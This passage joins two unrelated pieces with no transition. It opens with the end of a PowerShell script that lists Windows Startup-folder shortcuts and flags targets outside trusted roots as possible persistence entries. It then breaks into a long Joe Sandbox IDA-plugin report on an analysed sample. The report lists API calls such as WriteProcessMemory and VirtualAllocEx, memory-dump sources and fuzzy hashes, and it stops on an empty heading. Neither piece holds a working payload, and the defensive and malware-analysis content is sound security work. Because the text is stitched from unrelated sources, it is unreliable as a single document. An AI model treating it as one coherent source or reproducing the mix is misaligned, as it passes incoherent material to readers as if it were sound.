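            [Environment]::GetFolderPath('CommonStartup')   # all-users Startup
        )
    )
    $shell = New-Object -ComObject WScript.Shell
    # Roots a benign shortcut normally points into. Null entries (no Program Files (x86)
    # on 32-bit Windows) are dropped so StartsWith never receives a null.
    $trustedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) |
        Where-Object { $_ }

    foreach ($folder in $Folders) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        foreach ($lnk in Get-ChildItem -LiteralPath $folder -Filter *.lnk -File) {
            # CreateShortcut on an existing path loads the link instead of creating one.
            $sc = $shell.CreateShortcut($lnk.FullName)
            # Expand %VAR% forms so a target under %APPDATA% compares as a real path.
            $target = [Environment]::ExpandEnvironmentVariables([string]$sc.TargetPath)
            $trusted = $false
            foreach ($root in $trustedRoots) {
                if ($target.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $trusted = $true }
            }
            [pscustomobject]@{
                Shortcut   = $lnk.FullName
                Target     = $target
                Arguments  = $sc.Arguments
                WorkingDir = $sc.WorkingDirectory
                Suspicious = -not $trusted   # also true for an empty/unresolvable target
            }
        }
    }
}

Get-StartupShortcutTargets | Format-Table -AutoSize
```

The Arguments column matters as much as the target: a shortcut whose target is a trusted interpreter such as wscript.exe but whose arguments name a script under a user-writable directory is still a persistence entry, so review flagged and unflagged rows together rather than trusting the Suspicious bit alone.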
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00B750AD
                                                • Part of subcall function 00B800F0: __87except.LIBCMT ref: 00B8012B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                              • Instruction ID: 31d1a51c79c1af23fe5d4efa5cf1fc56d1fb1c18a15fcc8439d52f06f6a00a47
                                              • Opcode Fuzzy Hash: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                              • Instruction Fuzzy Hash: 84515A2192C60186DB617B24C84536E2BD4EB41790F30CDD9F4E9862B9DFB489D8DB86
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                              • Instruction ID: b3f22c91f5a50c8d084488386683625b3cd80e936139b3f2b96bb2570f400acd
                                              • Opcode Fuzzy Hash: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                              • Instruction Fuzzy Hash: 2F51A171900305DBDB24DF69C881BAAB7E4EF44304F2085BEE95AD7291E774EA44CB40
                                              APIs
                                                • Part of subcall function 00BB14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA9296,?,?,00000034,00000800,?,00000034), ref: 00BB14E6
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA983F
                                                • Part of subcall function 00BB1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00BB14B1
                                                • Part of subcall function 00BB13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00BB1409
                                                • Part of subcall function 00BB13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB1419
                                                • Part of subcall function 00BB13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB142F
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98AC
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                              • Instruction ID: dd9fc8ce328a927a6e325164ee9a9d4aea107a5927c62c1f26b395bed1f9315b
                                              • Opcode Fuzzy Hash: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                              • Instruction Fuzzy Hash: B7415E76901218BFCB10DFA4CC91AEEBBB8EB4A300F004099FA45B7181DA706E45DFA0
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BDF910,00000000,?,?,?,?), ref: 00BD79DF
                                              • GetWindowLongW.USER32 ref: 00BD79FC
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD7A0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BD7461
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BD7475
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD7499
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BD7C4A
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BD7C58
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BD7C5F
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BD6D3B
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BD6D4B
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BD6D70
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BD7772
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BD7787
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BD7794
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54AD0), ref: 00B54B45
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B54B57
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54B83,?), ref: 00B54C44
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B54C56
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54BD0,?,00B54DEF,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54C11
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B54C23
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00BD1039), ref: 00BD0DF5
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BD0E07
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BC8CF4,?,00BDF910), ref: 00BC90EE
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BC9100
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                              • Instruction ID: b942e7c42c7d116a0d68ac9b7b14216c748dfce02ae8281af500d7588edb0ed2
                                              • Opcode Fuzzy Hash: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                              • Instruction Fuzzy Hash: 55C13875A0C216AFCB14CFA4C884AAEBBF5FF49714B158598E805EB351DB30ED81DB90
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00BCE0BE
                                              • CharLowerBuffW.USER32(?,?), ref: 00BCE101
                                                • Part of subcall function 00BCD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BCE301
                                              • _memmove.LIBCMT ref: 00BCE314
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: e9a8053213897237a320edbe461afb0e9ec4c5ce26aa6211a49bddfa6d897e1d
                                              • Instruction ID: 0fa2c1c6b4ddf5a84ce3be9ed35011938ac0c929ed66de728885e94e8b574c93
                                              • Opcode Fuzzy Hash: e9a8053213897237a320edbe461afb0e9ec4c5ce26aa6211a49bddfa6d897e1d
                                              • Instruction Fuzzy Hash: DEC15871608301DFC715DF28C480A6ABBE4FF89714F1489AEF8A99B351D731E946CB82
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00BC80C3
                                              • CoUninitialize.COMBASE ref: 00BC80CE
                                                • Part of subcall function 00BAD56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00BAD5D4
                                              • VariantInit.OLEAUT32(?), ref: 00BC80D9
                                              • VariantClear.OLEAUT32(?), ref: 00BC83AA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: ba6899e1fb5c1b524507d28b1347df271f9f09575ffd4d95f4cec339f1e368c3
                                              • Instruction ID: b3aef4d8c8c5cb34c891ba2f78ff768a7318005d9ef0e2f8e3e04cf15c04ff22
                                              • Opcode Fuzzy Hash: ba6899e1fb5c1b524507d28b1347df271f9f09575ffd4d95f4cec339f1e368c3
                                              • Instruction Fuzzy Hash: 42A12535604B019FDB10DF54C885B2AB7E4BF89354F18449DF99A9B3A1CB30ED05CB96
                                              APIs
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00BA76EA
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BA7702
                                              • CLSIDFromProgID.COMBASE(?,?), ref: 00BA7727
                                              • _memcmp.LIBCMT ref: 00BA7748
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 8c9fefb23eeb8064c33767f370e4e6b4fd7a3a38f20496df21988c23d397f2aa
                                              • Instruction ID: 118b39d4911b12451cf4d12a3895e5e3d396e898b8d255729370bd90f0abf7af
                                              • Opcode Fuzzy Hash: 8c9fefb23eeb8064c33767f370e4e6b4fd7a3a38f20496df21988c23d397f2aa
                                              • Instruction Fuzzy Hash: D7811E75A04109EFCB04DFA8C984EEEB7F9FF89315F204599E505AB250DB71AE05CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 287c084694bb247acd395f90c408112840f2c020f0794be161b91b00589d918d
                                              • Instruction ID: 422887f989117446de1478ec2cfbcaf4b503272c12ba7526fc137160fc9febdd
                                              • Opcode Fuzzy Hash: 287c084694bb247acd395f90c408112840f2c020f0794be161b91b00589d918d
                                              • Instruction Fuzzy Hash: 9751B7B47083019ADB24AF65D89173AB3E5EF56310F28C89FE596D7291DB74D8408B01
                                              APIs
                                                • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                              • _free.LIBCMT ref: 00BB96A2
                                              • _free.LIBCMT ref: 00BB96A9
                                              • _free.LIBCMT ref: 00BB9714
                                                • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                              • _free.LIBCMT ref: 00BB971C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID:
                                              • API String ID: 1552873950-0
                                              • Opcode ID: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                              • Instruction ID: 3cd9946dd38b378b7dbcecea6b77675e0c77df7cf9095d83fc755e65d5618c96
                                              • Opcode Fuzzy Hash: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                              • Instruction Fuzzy Hash: 09514CB1904218AFDF259F65CC85AEEBBB9EF48304F1044EEB61DA3241DB715A81CF58
                                              APIs
                                              • GetWindowRect.USER32(00F9F808,?), ref: 00BD9863
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00BD9896
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BD9903
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                              • Instruction ID: ce2576db004739cd302633c6bd95ee27cdf058ad6ac1f17b6d70ab8013d48aef
                                              • Opcode Fuzzy Hash: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                              • Instruction Fuzzy Hash: 4B512E34A01205EFDF14CF58C890AAEBBF5FB46760F14819AF8559B3A0E731AD41DB90
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00BA9AD2
                                              • __itow.LIBCMT ref: 00BA9B03
                                                • Part of subcall function 00BA9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00BA9DBE
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00BA9B6C
                                              • __itow.LIBCMT ref: 00BA9BC3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: e29dedd417d2e7a07adf6d2ae059d8b3d75dfc90ca17e22f1f041e2312e75518
                                              • Instruction ID: 41de0057ec24aceab37786a28a768c0fba53756b935982b183fe03873a0931fa
                                              • Opcode Fuzzy Hash: e29dedd417d2e7a07adf6d2ae059d8b3d75dfc90ca17e22f1f041e2312e75518
                                              • Instruction Fuzzy Hash: 2941AE70A04208ABDF25EF54D885BEE7BF9EF49711F0040E9F905A7291DB709A48DBA1
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BBB89E
                                              • GetLastError.KERNEL32(?,00000000), ref: 00BBB8C4
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BBB8E9
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BBB915
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                              • Instruction ID: 4d4629bc6db0578237c1f6a490fcc52da41b01307c79b6c992d4d18068d3ad8b
                                              • Opcode Fuzzy Hash: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                              • Instruction Fuzzy Hash: 8241F839600A11DFCB11EF15C495A69BBE1EF8A350F1980D9ED4AAB362CB70FD05CB91
                                              APIs
